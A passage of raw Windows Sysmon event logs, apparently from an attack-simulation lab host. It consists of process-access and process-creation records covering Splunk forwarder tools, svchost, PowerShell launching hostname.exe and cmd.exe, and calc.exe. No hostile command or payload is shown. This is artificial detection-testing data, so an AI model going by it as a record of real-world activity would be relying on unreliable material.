Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000359999Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:40.166{8e433fbf-36d8-6013-9703-000000001100}10344C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000360015Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:41.009{8e433fbf-36d8-6013-9803-000000001100}85928004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360016Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:43.306{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360023Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62445200C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+1ed62|c:\windows\system32\cbdhsvc.dll+1e9c6|c:\windows\system32\cbdhsvc.dll+1e61e|c:\windows\system32\cbdhsvc.dll+1e289|c:\windows\system32\cbdhsvc.dll+1ef72|c:\windows\system32\cbdhsvc.dll+4063a|c:\windows\system32\cbdhsvc.dll+3e3f7|c:\windows\system32\cbdhsvc.dll+3d956|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360022Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8902-000000001100}6244C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+32810|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360021Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62449080C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+21ee8|C:\Windows\System32\appresolver.dll+1ef46|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360020Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62449080C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+1ee93|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360019Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62449080C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\appresolver.dll+221c5|C:\Windows\System32\appresolver.dll+1edcc|c:\windows\system32\cbdhsvc.dll+1fca4|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360018Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62449080C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+1fb9d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360017Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:44.869{8e433fbf-337b-6013-8902-000000001100}62445200C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7302-000000001100}7000C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\cbdhsvc.dll+b4a80|c:\windows\system32\cbdhsvc.dll+1e838|c:\windows\system32\cbdhsvc.dll+1e17e|c:\windows\system32\cbdhsvc.dll+1ef72|c:\windows\system32\cbdhsvc.dll+4063a|c:\windows\system32\cbdhsvc.dll+3e3f7|c:\windows\system32\cbdhsvc.dll+3d956|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360031Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-36de-6013-9903-000000001100}5264C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360030Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360029Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360028Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360027Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360026Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36de-6013-9903-000000001100}5264C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360025Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.983{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36de-6013-9903-000000001100}5264C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4179|UNKNOWN(00007FFC8EDAE154) 154100x8000000000000000360024Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.989{8e433fbf-36de-6013-9903-000000001100}5264C:\Windows\System32\HOSTNAME.EXE10.0.18362.1 (WinBuild.160101.0800)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=612DBA11F1DFAD1998609A647B740B34,SHA256=F88F37BFEFFC80D563B87AD6DE0F65D52D5760882013ABA5ECBE9FAD08D36777,IMPHASH=5CD891320C666621E9783444DB8CBA78{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000360454Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360453Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360452Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360451Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3) 10341000x8000000000000000360450Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360449Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+19318|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360448Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-0a00-000000001100}9044776C:\Windows\system32\services.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\services.exe+1c74|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360447Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360446Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360445Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360444Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360443Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360442Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27) 154100x8000000000000000360441Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.981{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating 